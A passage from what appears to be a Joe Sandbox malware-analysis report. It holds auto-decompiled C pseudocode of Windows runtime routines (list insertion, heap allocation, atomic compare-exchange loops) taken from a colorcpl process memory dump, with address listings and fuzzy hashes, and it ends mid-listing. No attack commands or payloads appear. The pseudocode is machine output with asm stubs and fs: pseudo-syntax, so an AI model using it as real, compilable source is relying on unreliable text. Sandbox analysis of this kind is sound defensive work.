				intOrPtr _t82;
				char _t84;
				void* _t87;
				intOrPtr _t88;
				void* _t92;
				intOrPtr* _t95;
				intOrPtr* _t97;
				intOrPtr* _t99;
				intOrPtr* _t101;
				void* _t102;
				intOrPtr* _t103;
				intOrPtr* _t104;
				signed short* _t105;
				intOrPtr _t106;
				intOrPtr _t107;
				intOrPtr _t108;
				signed int _t110;
				intOrPtr* _t113;
				intOrPtr* _t116;
				intOrPtr* _t117;
				intOrPtr _t119;
				void* _t120;
				void* _t124;

				_t105 = __edx;
				_t100 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t63 = __ecx;
				_v8 = __edx;
				_t110 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t63 + 0x154; // 0x154
				_t116 = _t3;
				_t97 =  *_t116;
				_t4 = _t110 + 2; // 0x2
				_t64 = _t4;
				while(_t97 != _t116) {
					if( *((intOrPtr*)(_t97 + 0x14)) != _t64) {
						L4:
						_t97 =  *_t97;
						continue;
					} else {
						_t7 = _t97 + 0x18; // 0x18
						if(E04398050(_t7, _t105[2], _t110) == _t110) {
							_t40 = _t97 + 0xc; // 0xc
							_t117 = _t40;
							_t113 =  *_t117;
							while(_t113 != _t117) {
								_t41 = _t113 + 8; // 0x8
								_t92 = E04388870(_a4, _t41, 0x10);
								_t124 = _t124 + 0xc;
								if(_t92 == 0) {
									L12:
									L13:
									return 0;
								} else {
									_t113 =  *_t113;
									continue;
								}
								goto L27;
							}
							_t104 = E04355D90(_t100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t104 != 0) {
								_t119 = _a4;
								_t46 = _t97 + 0xc; // 0xc
								_t95 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t108 =  *_t95;
								if( *((intOrPtr*)(_t108 + 4)) != _t95) {
									L22:
									_t102 = 3;
									asm("int 0x29");
									_push(_t119);
									_t120 = _t102;
									E043EA810(3,  &_v32,  &_v40);
									_t82 = E04355D90(_t102,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									 *((intOrPtr*)(_t120 + 0x134)) = _t82;
									if(_t82 != 0) {
										_t84 =  *((intOrPtr*)(_t120 + 0x8c)) +  *((intOrPtr*)(_t120 + 0x8c));
										_push(4);
										_push(0x1000);
										 *((intOrPtr*)(_t120 + 0x13c)) = _t84;
										_v16 = _t84;
										_push( &_v16);
										_push(0);
										_t62 = _t120 + 0x138; // 0x13b
										_push(0xffffffff);
										_t87 = E04382B10();
									} else {
										_t87 = 0xc0000017;
									}
									return _t87;
								} else {
									 *((intOrPtr*)(_t104 + 4)) = _t95;
									 *_t104 = _t108;
									 *((intOrPtr*)(_t108 + 4)) = _t104;
									 *_t95 = _t104;
									 *((intOrPtr*)(_t97 + 8)) =  *((intOrPtr*)(_t97 + 8)) + 1;
									_t88 = _v12;
									L11:
									 *(_t88 + 0xdc) =  *(_t88 + 0xdc) | 0x00000010;
									goto L12;
								}
							} else {
								L19:
								_push(0xe);
								_pop(0);
								goto L13;
							}
						} else {
							_t105 = _v8;
							_t9 = _t110 + 2; // 0x2
							_t64 = _t9;
							goto L4;
						}
					}
					L27:
				}
				_t10 = _t110 + 0x1a; // 0x1a
				_t99 = E04355D90(_t100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t99 == 0) {
					goto L19;
				} else {
					_t12 = _t110 + 2; // 0x2
					 *((intOrPtr*)(_t99 + 0x14)) = _t12;
					_t16 = _t99 + 0x18; // 0x18
					E043888C0(_t16, _v8[2], _t110);
					_t124 = _t124 + 0xc;
					 *((short*)(_t99 + _t110 + 0x18)) = 0;
					_t19 = _t99 + 0xc; // 0xc
					_t74 = _t19;
					 *((intOrPtr*)(_t74 + 4)) = _t74;
					 *_t74 = _t74;
					 *(_t99 + 8) =  *(_t99 + 8) & 0x00000000;
					_t101 = E04355D90(_t100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t101 == 0) {
						goto L19;
					} else {
						_t119 = _a4;
						_t26 = _t99 + 0xc; // 0xc
						_t77 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t106 =  *_t77;
						if( *((intOrPtr*)(_t106 + 4)) != _t77) {
							goto L22;
						} else {
							 *((intOrPtr*)(_t101 + 4)) = _t77;
							 *_t101 = _t106;
							 *((intOrPtr*)(_t106 + 4)) = _t101;
							 *_t77 = _t101;
							_t88 = _v12;
							 *(_t99 + 8) = 1;
							 *(_t88 + 0xdc) =  *(_t88 + 0xdc) | 0x00000010;
							_t34 = _t88 + 0x154; // 0x1ba
							_t103 = _t34;
							_t107 =  *_t103;
							if( *((intOrPtr*)(_t107 + 4)) != _t103) {
								goto L22;
							} else {
								 *_t99 = _t107;
								 *((intOrPtr*)(_t99 + 4)) = _t103;
								 *((intOrPtr*)(_t107 + 4)) = _t99;
								 *_t103 = _t99;
								goto L11;
							}
						}
					}
				}
				goto L27;
			}

0x04413157
0x04413157
0x0441315c
0x0441315d
0x04413160
0x04413162
0x04413166
0x04413169
0x0441316c
0x0441316c
0x04413172
0x04413174
0x04413174
0x0441319b
0x0441317c
0x04413199
0x04413199
0x00000000
0x0441317e
0x04413182
0x0441318d
0x0441325f
0x0441325f
0x04413262
0x0441327d
0x04413268
0x0441326f
0x04413274
0x04413279
0x04413256
0x04413258
0x0441325c
0x0441327b
0x0441327b
0x00000000
0x0441327b
0x00000000
0x04413279
0x04413293
0x04413297
0x0441329e
0x044132a4
0x044132a4
0x044132a7
0x044132a8
0x044132a9
0x044132aa
0x044132ab
0x044132b0
0x044132c4
0x044132c6
0x044132c7
0x044132d1
0x044132d5
0x044132de
0x044132f1
0x044132f6
0x044132fe
0x0441330d
0x0441330f
0x04413311
0x04413316
0x0441331c
0x04413322
0x04413323
0x04413325
0x0441332c
0x0441332e
0x04413300
0x04413300
0x04413300
0x04413335
0x044132b2
0x044132b2
0x044132b5
0x044132b7
0x044132ba
0x044132bc
0x044132bf
0x0441324f
0x0441324f
0x00000000
0x0441324f
0x04413299
0x04413299
0x04413299
0x0441329b
0x00000000
0x0441329b
0x04413193
0x04413193
0x04413196
0x04413196
0x00000000
0x04413196
0x0441318d
0x00000000
0x0441317c
0x0441319f
0x044131b3
0x044131b7
0x00000000
0x044131bd
0x044131bd
0x044131c0
0x044131ca
0x044131ce
0x044131d5
0x044131d8
0x044131dd
0x044131dd
0x044131e0
0x044131e3
0x044131eb
0x044131fb
0x044131ff
0x00000000
0x04413205
0x04413205
0x0441320b
0x0441320b
0x0441320e
0x0441320f
0x04413210
0x04413211
0x04413212
0x04413217
0x00000000
0x0441321d
0x0441321d
0x04413220
0x04413222
0x04413225
0x04413227
0x0441322a
0x04413231
0x04413238
0x04413238
0x0441323e
0x04413243
0x00000000
0x04413245
0x04413245
0x04413247
0x0441324a
0x0441324d
0x00000000
0x0441324d
0x04413243
0x04413217
0x044131ff
0x00000000

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8e46193db8e3b5b16c475c6b7e0eac9c3dab9cb937863f6c3e187fb8c66faf7
Instruction ID: 5c8881de1871f66c30bc569cb7da38696629dd8e183b13033a110aeb17f8b736
Opcode Fuzzy Hash: f8e46193db8e3b5b16c475c6b7e0eac9c3dab9cb937863f6c3e187fb8c66faf7
Instruction Fuzzy Hash: 3D514871200606EFEF15DF54C580A96FBB5FF45708F1585AAE8089F262E371F945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0434D454 Relevance: .1, Instructions: 138
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E0434D454(signed int _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr* _a16) {
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int* _t34;
				signed char* _t35;
				signed int _t36;
				signed char* _t37;
				intOrPtr _t39;
				signed int _t44;
				signed int _t46;
				signed int* _t49;
				signed char* _t50;
				signed int _t51;
				signed int _t57;
				intOrPtr _t78;
				signed int _t79;
				intOrPtr* _t86;
				signed int _t88;
				intOrPtr _t90;

				_v12 = _v12 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_t34 =  *( *[fs:0x30] + 0x50);
				if(_t34 != 0) {
					__eflags =  *_t34;
					if(__eflags == 0) {
						goto L1;
					}
					_t35 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
					L2:
					_t70 = 0x7ffe0384;
					if(( *_t35 & 0x00000001) != 0) {
						_t36 = E04353C40();
						__eflags = _t36;
						if(_t36 == 0) {
							_t37 = 0x7ffe0384;
						} else {
							_t37 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
						}
						E043CFC01(0x4311bf0,  *_t37 & 0x000000ff);
					}
					_t88 = _a4;
					if(_t88 == 0) {
						L37:
						_t39 = 0xc000000d;
						goto L14;
					} else {
						_t86 = _a8;
						if(_t86 == 0) {
							goto L37;
						}
						if( *((intOrPtr*)( *[fs:0x18] + 0xfe0)) == 0 ||  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0xfe0)))) != _t88 ||  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0xfe0)) + 4)) != _t86) {
							_v16 = _t88 & 0xfffffffc;
							_t44 = E0434DE20(0x4311bf0, __eflags, _t88, 1, 2,  &_v8);
							__eflags = _t44;
							if(_t44 != 0) {
								__eflags = _t86 - _t44;
								if(__eflags < 0) {
									L28:
									_push( &_v12);
									_push(_t86);
									_t46 = E043CF615(_t70, _t88, _t86, _t88, __eflags);
									__eflags = _t46;
									if(_t46 != 0) {
										__eflags = _t46 - 0xffffffff;
										if(_t46 != 0xffffffff) {
											_t88 = _t46;
										}
									}
									goto L9;
								}
								_t78 = E043CF73D(_t88,  &_v20, __eflags);
								_v8 = _t78;
								__eflags = _t78 - 0xc000007b;
								if(_t78 == 0xc000007b) {
									_t90 = _v8;
									goto L10;
								}
								_t79 = _v20;
								__eflags = _t79;
								if(_t79 == 0) {
									goto L9;
								}
								_t57 = _v16;
								__eflags = _t86 - _t57;
								if(__eflags < 0) {
									goto L28;
								}
								__eflags = _t86 - _t57 + _t79;
								if(__eflags < 0) {
									goto L9;
								}
								goto L28;
							}
							_t90 = 0xc0000089;
							goto L10;
						} else {
							_t88 =  *( *((intOrPtr*)( *[fs:0x18] + 0xfe0)) + 8);
							L9:
							_t90 = E0434DA30(_t88, _t86, _a12, _a16);
							L10:
							_t49 =  *( *[fs:0x30] + 0x50);
							if(_t49 != 0) {
								__eflags =  *_t49;
								if( *_t49 == 0) {
									goto L11;
								}
								_t50 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
								L12:
								if(( *_t50 & 0x00000001) != 0) {
									_t51 = E04353C40();
									__eflags = _t51;
									if(_t51 != 0) {
										_t70 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
										__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
									}
									E043CFC01(0x4311c00,  *_t70 & 0x000000ff);
								}
								_t39 = _t90;
								L14:
								return _t39;
							}
							L11:
							_t50 = 0x7ffe0385;
							goto L12;
						}
					}
				}
				L1:
				_t35 = 0x7ffe0385;
				goto L2;
			}

0x0434d465
0x0434d46a
0x0434d470
0x0434d477
0x043a3cf4
0x043a3cf7
0x00000000
0x00000000
0x043a3d06
0x0434d482
0x0434d485
0x0434d48a
0x043a3d10
0x043a3d15
0x043a3d17
0x043a3d29
0x043a3d19
0x043a3d22
0x043a3d22
0x043a3d33
0x043a3d33
0x0434d490
0x0434d495
0x043a3e12
0x043a3e12
0x00000000
0x0434d49b
0x0434d49b
0x0434d4a0
0x00000000
0x00000000
0x0434d4b3
0x043a3d42
0x043a3d50
0x043a3d55
0x043a3d57
0x043a3d63
0x043a3d65
0x043a3d9e
0x043a3da4
0x043a3da5
0x043a3da6
0x043a3dab
0x043a3dad
0x043a3db3
0x043a3db6
0x043a3dbc
0x043a3dbc
0x043a3db6
0x00000000
0x043a3dad
0x043a3d72
0x043a3d74
0x043a3d78
0x043a3d7e
0x043a3dc3
0x00000000
0x043a3dc3
0x043a3d80
0x043a3d84
0x043a3d86
0x00000000
0x00000000
0x043a3d8c
0x043a3d90
0x043a3d92
0x00000000
0x00000000
0x043a3d96
0x043a3d98
0x00000000
0x00000000
0x00000000
0x043a3d98
0x043a3d59
0x00000000
0x0434d4e2
0x0434d4ee
0x0434d4f1
0x0434d500
0x0434d502
0x0434d508
0x0434d50d
0x043a3dcc
0x043a3dcf
0x00000000
0x00000000
0x043a3dde
0x0434d518
0x0434d51b
0x043a3de8
0x043a3ded
0x043a3def
0x043a3dfa
0x043a3dfa
0x043a3dfa
0x043a3e08
0x043a3e08
0x0434d521
0x0434d523
0x0434d529
0x0434d529
0x0434d513
0x0434d513
0x00000000
0x0434d513
0x0434d4b3
0x0434d495
0x0434d47d
0x0434d47d
0x00000000

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af04b129f392816d6a017edfdebf71a12d7be4d8f3e1eac5fb013398ba18ab51
Instruction ID: f1b63ad1ce5c382aef3e68cdefd15ab84f2784aa9b1ad29a9002105d047fc900
Opcode Fuzzy Hash: af04b129f392816d6a017edfdebf71a12d7be4d8f3e1eac5fb013398ba18ab51
Instruction Fuzzy Hash: 66518E31744A91CFD725CB18C444BAAB3E9EB84B54F0964A9EC52CB7A0EB34FC50DB61

Uniqueness

Uniqueness Score: -1.00%

Function 04370118 Relevance: .1, Instructions: 138
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E04370118(void* __ebx, intOrPtr* __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* __eflags) {
				short _t46;
				short _t49;
				signed int _t58;
				signed short _t60;
				signed char _t64;
				intOrPtr* _t74;
				intOrPtr* _t76;
				signed short _t80;
				signed short* _t82;
				signed short _t83;
				signed short _t88;
				intOrPtr _t91;
				intOrPtr _t97;
				intOrPtr* _t99;
				short _t101;
				void* _t103;

				_t76 = __ecx;
				_push(0x2c);
				_push(0x441c630);
				E04397BE4(__ebx, __edi, __esi);
				_t99 = __edx;
				 *((intOrPtr*)(_t103 - 0x38)) = __edx;
				_t74 = __ecx;
				 *((intOrPtr*)(_t103 - 0x34)) = __ecx;
				if(E04370504(__ecx) == 0) {
					_t46 = 0xc000000d;
					L13:
					 *[fs:0x0] =  *((intOrPtr*)(_t103 - 0x10));
					return _t46;
				}
				 *((intOrPtr*)(_t103 - 4)) = 0;
				if(E04370470(__edx, _t103 - 0x1c) != 0) {
					_t49 =  *((intOrPtr*)(_t103 - 0x1c));
					__eflags = _t49 - 0xc000;
					if(_t49 >= 0xc000) {
						_t49 = 0;
						 *((short*)(_t103 - 0x1c)) = 0;
						_t101 = 0xc000000d;
					} else {
						_t101 = 0;
					}
					 *((intOrPtr*)(_t103 - 0x20)) = _t101;
					_t80 =  *(_t103 + 8);
					__eflags = _t80;
					if(_t80 != 0) {
						 *_t80 = _t49;
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					E043524D0( *((intOrPtr*)(_t103 - 0x34)) + 8);
					_t46 = _t101;
					goto L13;
				}
				if( *_t99 == 0) {
					_t101 = 0xc0000033;
					L11:
					 *((intOrPtr*)(_t103 - 0x20)) = _t101;
					goto L12;
				}
				_t81 = _t74;
				_t101 = E0437035F(_t74, _t99, _t76, _t103 - 0x2c, _t103 - 0x24, _t103 - 0x30, _t103 - 0x28);
				 *((intOrPtr*)(_t103 - 0x20)) = _t101;
				if(_t101 < 0) {
					goto L12;
				}
				_t91 =  *((intOrPtr*)(_t103 - 0x28));
				if(_t91 != 0) {
					_t82 =  *(_t103 - 0x30);
					_t58 =  *_t82 & 0x0000ffff;
					__eflags = _t58 - 0xffff;
					if(_t58 == 0xffff) {
						_t82[1] = _t82[1] | 0x00000001;
					} else {
						_t60 = _t58 + 1;
						__eflags = _t60;
						 *_t82 = _t60;
					}
					_t83 =  *(_t103 + 8);
					__eflags = _t83;
					if(_t83 != 0) {
						 *_t83 =  *((intOrPtr*)(_t91 + 6));
					}
					_t101 = 0;
					goto L11;
				}
				_t114 =  *((intOrPtr*)(_t103 - 0x2c)) - _t91;
				if( *((intOrPtr*)(_t103 - 0x2c)) == _t91) {
					_t101 = 0xc000000d;
					goto L11;
				}
				_t101 = 0xc0000017;
				 *((intOrPtr*)(_t103 - 0x20)) = 0xc0000017;
				_t97 = E04370774(_t103 - 0x30, _t114, _t81);
				 *((intOrPtr*)(_t103 - 0x28)) = _t97;
				if(_t97 == 0) {
					goto L12;
				}
				_t18 = _t97 + 0xe; // 0xe
				E043888C0(_t18,  *((intOrPtr*)(_t103 - 0x38)),  *(_t103 - 0x24));
				_t64 =  *(_t103 - 0x24) >> 1;
				 *(_t97 + 0xc) = _t64;
				 *((short*)(_t97 + 0xe + (_t64 & 0x000000ff) * 2)) = 0;
				if(E043705C0(_t74, _t74, _t97) == 0) {
					E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t97);
					_t101 =  *((intOrPtr*)(_t103 - 0x20));
					goto L12;
				}
				 *(_t97 + 6) = 0x0000c000 |  *(_t97 + 4);
				 *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x2c)))) = _t97;
				_t88 =  *(_t103 + 8);
				if(_t88 != 0) {
					 *_t88 =  *(_t97 + 6);
				}
				_t101 = 0;
				goto L11;
			}

0x04370118
0x04370118
0x0437011a
0x0437011f
0x04370124
0x04370126
0x04370129
0x0437012b
0x04370135
0x043b0bce
0x04370222
0x04370225
0x04370231
0x04370231
0x0437013d
0x0437014c
0x0437025f
0x04370263
0x04370266
0x04370279
0x0437027b
0x0437027f
0x04370268
0x04370268
0x04370268
0x0437026a
0x0437026d
0x04370270
0x04370272
0x04370274
0x04370274
0x0437020d
0x0437020d
0x0437021b
0x04370220
0x00000000
0x04370220
0x04370155
0x043b0bd8
0x0437020a
0x0437020a
0x00000000
0x0437020a
0x0437016e
0x04370175
0x04370177
0x0437017c
0x00000000
0x00000000
0x04370182
0x04370187
0x04370234
0x04370237
0x0437023f
0x04370242
0x04370286
0x04370244
0x04370244
0x04370244
0x04370245
0x04370245
0x04370248
0x0437024b
0x0437024d
0x04370253
0x04370253
0x04370256
0x00000000
0x04370256
0x0437018d
0x04370190
0x043b0bfb
0x00000000
0x043b0bfb
0x04370196
0x0437019b
0x043701aa
0x043701ac
0x043701b1
0x00000000
0x00000000
0x043701b9
0x043701bd
0x043701c8
0x043701ca
0x043701d2
0x043701e2
0x043b0bee
0x043b0bf3
0x00000000
0x043b0bf3
0x043701f1
0x043701f8
0x043701fa
0x043701ff
0x04370205
0x04370205
0x04370208
0x00000000

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 661cb8a3b9b8ac7407ad2f16567371bad69b8903457aa6595b42cddb71b60d6c
Instruction ID: 4ee7287b63a95a5f8ecf12f96205414cfaf800f4e6c5745af44e84378e4717ac
Opcode Fuzzy Hash: 661cb8a3b9b8ac7407ad2f16567371bad69b8903457aa6595b42cddb71b60d6c
Instruction Fuzzy Hash: B941FF36A01218DBCB28DF98C440AEEF7B4BF48704F14616AE995E7650E738AC01CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 04382670 Relevance: .1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E04382670(intOrPtr* __ecx, intOrPtr* __edx) {
				signed int _v8;
				intOrPtr* _v12;
				intOrPtr* _v16;
				signed int _v20;
				signed int* _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __ebx;
				signed int* _t57;
				signed int _t63;
				intOrPtr _t68;
				char* _t70;
				signed int _t80;
				signed int _t89;
				signed int _t91;
				intOrPtr* _t97;
				intOrPtr _t99;
				signed int _t100;
				signed int _t101;
				signed int _t105;
				void* _t107;
				intOrPtr* _t108;
				signed int _t113;

				_t97 = __ecx;
				_v16 = __edx;
				_v12 = __ecx;
				if( *__ecx != __edx) {
					asm("sbb eax, eax");
					_t105 = 0;
					_v8 = 0;
					_t80 = 0;
					_t4 = _t97 + 0x10; // -16
					_t57 = _t4;
					_v24 = _t57;
					while(1) {
						_t113 =  *_t57;
						_v20 = _t113;
						if((_t113 >> 0x00000010 & 0x00008000) != 0) {
							goto L8;
						}
						if(_t113 == 0) {
							L27:
							L2:
							return _t105;
						}
						asm("lock cmpxchg [edx], ecx");
						_t97 = _v12;
						if(_t113 == _t113) {
							L10:
							if(_t113 == 0xffffffff) {
								goto L27;
							}
							if(_t113 == 0) {
								L26:
								 *_v24 = _t113;
								goto L27;
							}
							_t63 =  *_t97 + 0x50;
							_v28 =  ~( *(_t97 + 0x18) & 0x0000ffff);
							_v8 = _t63;
							do {
								_t107 =  *_t63;
								_t99 =  *((intOrPtr*)(_t63 + 4));
								_v32 = _t99;
								asm("lock cmpxchg8b [esi]");
								_t63 = _v8;
							} while (_t107 != _t107 || _t99 != _v32);
							_t113 = _v20;
							_t100 =  *(_v12 + 0x18) & 0x0000ffff;
							_v8 = _t100;
							_t108 = _v16 + 0x50;
							do {
								_t68 =  *_t108;
								_t89 =  *(_t108 + 4);
								_v32 = _t68;
								_v28 = _t89;
								_t101 = _t89 + 1;
								if(_t100 == 0) {
									_t101 = _t89 - 1;
								}
								_v20 = _t101;
								asm("lock cmpxchg8b [edi]");
								_t91 = _t89;
								_t100 = _v8;
							} while (_t68 != _v32 || _t91 != _v28);
							_t84 = _v12;
							 *_v12 = _v16;
							_t105 = 1;
							if(E04353C40() == 0) {
								_t70 = 0x7ffe0380;
							} else {
								_t70 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							}
							if( *_t70 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
								E043FEEE7(_t84,  *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0xc)) + 0xc)),  *((intOrPtr*)(_t84 + 4)), ( *( *[fs:0x18] + 0xfa8) & 0x000000ff) - 1);
							}
							goto L26;
						}
						L8:
						_t80 = _t80 + 1;
						if(_t80 <= _v8) {
							_t6 = _t97 + 0x10; // -16
							_t57 = _t6;
							continue;
						}
						_t113 = _t113 | 0xffffffff;
						_v20 = _t113;
						goto L10;
					}
				}
				_t105 = 1;
				goto L2;
			}

0x0438267a
0x0438267d
0x04382680
0x04382685
0x043ba165
0x043ba16a
0x043ba16c
0x043ba16f
0x043ba171
0x043ba171
0x043ba175
0x043ba17d
0x043ba17d
0x043ba184
0x043ba18c
0x00000000
0x00000000
0x043ba191
0x043ba2b1
0x0438268e
0x04382692
0x04382692
0x043ba1a4
0x043ba1a8
0x043ba1ad
0x043ba1bb
0x043ba1be
0x00000000
0x00000000
0x043ba1c6
0x043ba2ac
0x043ba2af
0x00000000
0x043ba2af
0x043ba1d4
0x043ba1d7
0x043ba1da
0x043ba1dd
0x043ba1dd
0x043ba1df
0x043ba1e4
0x043ba1f1
0x043ba1fa
0x043ba1fa
0x043ba207
0x043ba20a
0x043ba214
0x043ba217
0x043ba219
0x043ba219
0x043ba21d
0x043ba220
0x043ba223
0x043ba229
0x043ba22c
0x043ba22e
0x043ba22e
0x043ba231
0x043ba23a
0x043ba23e
0x043ba240
0x043ba243
0x043ba24d
0x043ba253
0x043ba257
0x043ba25f
0x043ba271
0x043ba261
0x043ba26a
0x043ba26a
0x043ba279
0x043ba2a7
0x043ba2a7
0x00000000
0x043ba279
0x043ba1af
0x043ba1af
0x043ba1b3
0x043ba17a
0x043ba17a
0x00000000
0x043ba17a
0x043ba1b5
0x043ba1b8
0x00000000
0x043ba1b8
0x043ba17d
0x0438268d
0x00000000

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 378b6ea2690461ba2e231297a609f0620a72d96a2581e8c9db1b1bf84233c730
Instruction ID: d2eedb65b2578ecd85a7d22987280df910d2c9a47cfb91484bc2d01a370b949c
Opcode Fuzzy Hash: 378b6ea2690461ba2e231297a609f0620a72d96a2581e8c9db1b1bf84233c730
Instruction Fuzzy Hash: B1515975A00A19CFCB14DF98C480AAEF7B1FF88714F2491A9D965AB750D731AE81CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 04346074 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 454b987d283cf3e72f9609519aea0abdf8c9fd4dca5a193f072db34df35d03c1
Instruction ID: 49619017b9f877aa476c1de3702c8906539d4ccd2c544bfbb39444237641dcfc
Opcode Fuzzy Hash: 454b987d283cf3e72f9609519aea0abdf8c9fd4dca5a193f072db34df35d03c1
Instruction Fuzzy Hash: A551E470A406069BEB29CF24CC01BE9B7F4EF46318F1592A9D529A76D1E778B981CF40

Uniqueness

Uniqueness Score: -1.00%

Function 044081EE Relevance: .1, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E044081EE(signed char __ecx, intOrPtr __edx, void* __eflags, signed int _a4, intOrPtr _a8) {
				signed char _v8;
				void* _v12;
				char _v16;
				intOrPtr _v20;
				signed char _v24;
				signed char _v28;
				signed char _t42;
				char* _t44;
				void* _t55;
				signed char _t59;
				signed char _t61;
				void* _t62;
				signed char _t65;
				signed char _t67;
				signed char _t71;
				intOrPtr _t78;
				signed int _t89;

				_t61 = __ecx;
				_v8 = __ecx;
				_v20 = __edx;
				_t89 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				if(E04408435(__ecx + 0x18) != 0) {
					_v28 = 0;
					_t65 = 0;
					_v16 = 0;
					if((_t89 & 0x01000000) != 0) {
						L10:
						if(_a8 != 0) {
							_t89 = _t89 | 0x00000008;
						}
						_t42 = E04408411(_t65 + _v20, _t89);
						_t78 = _v20;
						_t67 = _t42;
						_v24 = _t67;
						if(_t67 < _t78 || _t78 > 0x7fffffff) {
							goto L2;
						} else {
							_t69 = _t61;
							_t62 = E04408360(_t61, _t78, _t67, _t89 & 0x13000003,  &_v12);
							if(_t62 == 0 || (_t89 & 0x30000f08) == 0) {
								goto L3;
							} else {
								_t55 = E044084E2(_v8, _t62, _v20, _t69, _v16, _t89, _a8);
								_t71 = _v28;
								if(_t71 == 0) {
									goto L3;
								} else {
									 *(_t55 + 2) =  *(_t55 + 2) ^ ( *(_t55 + 2) ^ _t71) & 0x0000000f;
									if(E043E78DE(_t71, _v8, _t62, 2, _t55 + 8) >= 0) {
										goto L3;
									} else {
										_t90 = _v8;
										E044086A8(_v8, _t62, _t89, 0, 0);
										_t62 = 0;
									}
								}
							}
						}
					} else {
						_t59 =  *(__ecx + 0x10);
						_v28 = _t59;
						if(_t59 == 0) {
							goto L10;
						} else {
							_t89 = _t89 | 0x00000008;
							if(E043E78DE(_t59, __ecx, 0, 1,  &_v16) < 0) {
								goto L1;
							} else {
								_t65 = _v16;
								goto L10;
							}
						}
					}
				} else {
					L1:
					_v24 = 0;
					L2:
					_v12 = 0;
					_t62 = 0;
					L3:
					_t90 = _v8;
				}
				if(E04353C40() == 0) {
					_t44 = 0x7ffe0380;
				} else {
					_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t44 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E043FEF66(_t90, _t62, _v24, _v12);
				}
				return _t62;
			}

0x044081f7
0x044081fd
0x0440820e
0x04408211
0x04408220
0x0440824d
0x04408250
0x04408252
0x0440825b
0x04408281
0x04408285
0x04408287
0x04408287
0x0440828f
0x04408294
0x04408297
0x04408299
0x0440829e
0x00000000
0x044082ac
0x044082b9
0x044082c0
0x044082c4
0x00000000
0x044082d6
0x044082e7
0x044082ec
0x044082f1
0x00000000
0x044082f7
